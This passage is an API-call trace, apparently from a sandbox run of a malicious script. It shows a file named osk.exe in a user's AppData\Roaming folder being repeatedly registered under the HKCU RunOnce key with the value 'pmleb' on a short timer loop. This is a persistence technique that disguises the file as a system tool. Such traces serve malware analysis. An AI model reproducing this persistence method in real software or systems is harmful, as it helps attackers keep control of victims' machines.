[0079.834] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.834] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.834] RegCloseKey (hKey=0x280) returned 0x0 [0079.834] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.834] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.834] SetTimer (hWnd=0x20280, nIDEvent=0x2054, uElapse=0xa, lpTimerFunc=0x0) returned 0x2054 [0079.834] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.846] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.846] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.846] KillTimer (hWnd=0x20280, uIDEvent=0x2054) returned 1 [0079.847] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.847] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.847] IUnknown:Release (This=0x787518) returned 0x1 [0079.847] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.847] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.847] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.847] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.848] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0079.848] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.848] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x56 [0079.848] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.848] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0079.849] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.849] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.849] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.849] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.849] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.849] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.849] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.849] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.849] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.849] RegCloseKey (hKey=0x280) returned 0x0 [0079.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.850] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.850] SetTimer (hWnd=0x20280, nIDEvent=0x2055, uElapse=0xa, lpTimerFunc=0x0) returned 0x2055 [0079.850] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.862] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.862] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.862] KillTimer (hWnd=0x20280, uIDEvent=0x2055) returned 1 [0079.862] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.862] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.862] IUnknown:Release (This=0x787518) returned 0x1 [0079.862] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.863] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.863] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.863] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.863] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0079.863] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.863] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x57 [0079.863] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.864] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0079.864] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.864] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.864] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.864] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.864] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.864] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.864] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.865] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.865] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.865] RegCloseKey (hKey=0x280) returned 0x0 [0079.865] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.865] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.865] SetTimer (hWnd=0x20280, nIDEvent=0x2056, uElapse=0xa, lpTimerFunc=0x0) returned 0x2056 [0079.865] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.877] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.877] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.878] KillTimer (hWnd=0x20280, uIDEvent=0x2056) returned 1 [0079.878] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.878] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.878] IUnknown:Release (This=0x787518) returned 0x1 [0079.878] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.878] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.878] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.878] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.879] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.879] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.879] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0079.879] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.879] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x58 [0079.879] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.880] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0079.880] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.880] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.880] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.880] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.880] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.880] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.880] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 